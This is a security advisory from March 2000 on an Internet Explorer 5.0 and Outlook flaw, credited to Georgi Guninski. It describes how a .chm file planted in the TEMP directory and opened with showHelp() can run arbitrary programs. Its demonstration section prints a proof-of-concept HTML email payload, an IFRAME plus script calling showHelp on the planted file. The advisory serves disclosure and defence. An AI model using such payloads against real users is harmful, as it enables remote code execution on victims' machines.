IE and Outlook May Run Arbitrary Code

Reported March 14, 2000 by Georgi Guninski
VERSIONS AFFECTED
  • Internet Explorer 5.0, Outlook

DESCRIPTION

Georgi discovered that a user could place a .chm file in the TEMP directory where that file could contain a "shortcut" command. When the file is opened with the showHelp() procedure, any listed programs could be executed by the operating system.

DEMONSTRATION

Such a problem could be used to launch an attack against an unsuspecting user of Outlook. Code similar to the following may cause a program to run on a remote desktop.

<IFRAME align=3Dbaseline alt=3D""
=border=3D0 hspace=3D0=20 src=3D"cid:000701bf8458$eb570380$dc0732d4@bbb"></IFRAME>
<SCRIPT>
setTimeout("window.showHelp("c:/windows/temp/abcde.chm");",1000);
setTimeout("window.showHelp("c:/temp/abcde.chm");",1000);
</SCRIPT>

VENDOR RESPONSE

Microsoft is aware of this issue, however no response was known at the time of this writing.

CREDITS
Discovered by Georgi Guninski